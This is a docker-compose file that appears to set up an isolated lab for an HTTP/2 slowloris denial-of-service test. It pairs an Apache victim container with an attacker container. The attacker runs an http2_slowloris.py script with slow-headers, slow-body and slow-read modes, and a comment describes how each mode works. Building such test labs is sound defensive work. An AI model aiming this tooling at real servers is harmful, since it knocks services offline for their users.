# docker-compose for HTTP/2 slowloris part B  
name: http2-slowloris-lab-B

services:
  victim:
    build:
      context: .
      dockerfile: Dockerfile.victim
    container_name: loris-victim-apache-latest
    ports:
      - "8080:80" # HTTP/2 cleartext
    networks:
      - attack-net

  attacker:
    build:
      context: .
      dockerfile: Dockerfile.http2_slowloris_attacker
    container_name: http2-slowloris-attacker
    environment:
      - PYTHONUNBUFFERED=1
    # AGGRESSIVE HTTP/2 Low and Slow attack techniques:
    # - Slow Headers: Endless CONTINUATION frames that never complete
    # - Slow Body (RUDY): Massive Content-Length with 1 byte/second trickling
    # - Slow Read: Tiny window updates forcing server buffering
    command: >
      python3 http2_slowloris.py 
      victim 
      --port 80
      --connections 75
      --streams 50
      --types slow_headers slow_body slow_read
    networks:
      - attack-net
    depends_on:
      - victim

networks:
  attack-net: